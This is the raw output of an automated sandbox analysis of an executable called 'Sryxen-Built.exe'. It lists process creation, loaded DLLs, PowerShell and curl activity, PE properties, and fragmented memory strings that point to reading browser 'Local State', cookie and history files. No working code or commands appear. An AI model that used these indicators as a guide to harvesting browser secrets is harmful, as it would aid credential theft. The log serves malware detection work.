Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7000 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6344 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2092,i,268919721594276684,6312096580971565461,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2052,i,6752636974988034322,17708656779778021828,262144 /prefetch:3
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Sryxen-Built.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Sryxen-Built.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Sryxen-Built.exeStatic file information: File size 3513696 > 1048576
Source: Sryxen-Built.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2b2000
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Sryxen-Built.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1227446361.0000018D46219000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228745562.0000018D4621A000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Comms\Unistore\datap.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1309358098.0000018D46284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb{ source: Sryxen-Built.exe, 00000000.00000003.1236123884.0000018D46209000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Data\Local Stateate source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ta source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbpi0112724rsegmnoittet-es.filesOW source: Sryxen-Built.exe, 00000000.00000003.1236441733.0000018D46283000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236771454.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1239318698.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1238196537.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234646624.0000018D4627D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831cal State source: Sryxen-Built.exe, 00000000.00000003.1243135675.0000018D46216000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243405669.0000018D46217000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateStateA source: Sryxen-Built.exe, 00000000.00000003.1231839076.0000018D4621B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1232355664.0000018D4621C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*e source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe source: Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831al Statev source: Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831es\ESEatez source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831okiesate source: Sryxen-Built.exe, 00000000.00000003.1247609444.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Data\Local StateeeA source: Sryxen-Built.exe, 00000000.00000003.1236154256.0000018D4621B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236123884.0000018D46209000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtate source: Sryxen-Built.exe, 00000000.00000003.1240197390.0000018D46217000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236123884.0000018D46209000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbt source: Sryxen-Built.exe, 00000000.00000003.1231270289.0000018D46214000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb| source: Sryxen-Built.exe, 00000000.00000003.1227446361.0000018D46219000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statecal State source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*s\* source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C\Temp\* source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbre\idb\3870112724rsegmnoittet-es.files\* source: Sryxen-Built.exe, 00000000.00000003.1243135675.0000018D46216000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ta\* source: Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User DatataateE source: Sryxen-Built.exe, 00000000.00000003.1238559982.0000018D46272000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Data\Local Statete source: Sryxen-Built.exe, 00000000.00000003.1228626688.0000018D46252000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tate source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*e\*s source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC23 source: Sryxen-Built.exe, 00000000.00000003.1227554283.0000018D46269000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227428811.0000018D46264000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227402785.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227568090.0000018D4626D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbetlb source: Sryxen-Built.exe, 00000000.00000003.1251249271.0000018D4620C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251150907.0000018D4620B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbrate\StagedAssets\User Data\Local Statedobe.Z source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*\*el source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831story source: Sryxen-Built.exe, 00000000.00000003.1227554283.0000018D46269000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227428811.0000018D46264000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227402785.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227568090.0000018D4626D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*Stateh source: Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231680659.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1232302461.0000018D46251000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231900601.0000018D46250000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb.jfmvernedChannelStates.jsonINp source: Sryxen-Built.exe, 00000000.00000003.1228166392.0000018D46242000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbsesate source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D4621A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2Bates source: Sryxen-Built.exe, 00000000.00000003.1231680659.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1232302461.0000018D46251000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231900601.0000018D46250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local StateeesY source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250408868.0000018D46274000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ate source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb*eK source: Sryxen-Built.exe, 00000000.00000003.1255310974.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1247984734.0000018D46250000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251705885.0000018D46252000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1248626143.0000018D46253000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251249271.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1248168816.0000018D46252000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1256025863.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1254378340.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1261036800.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbefoxy source: Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local StateteStateI source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250408868.0000018D46274000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
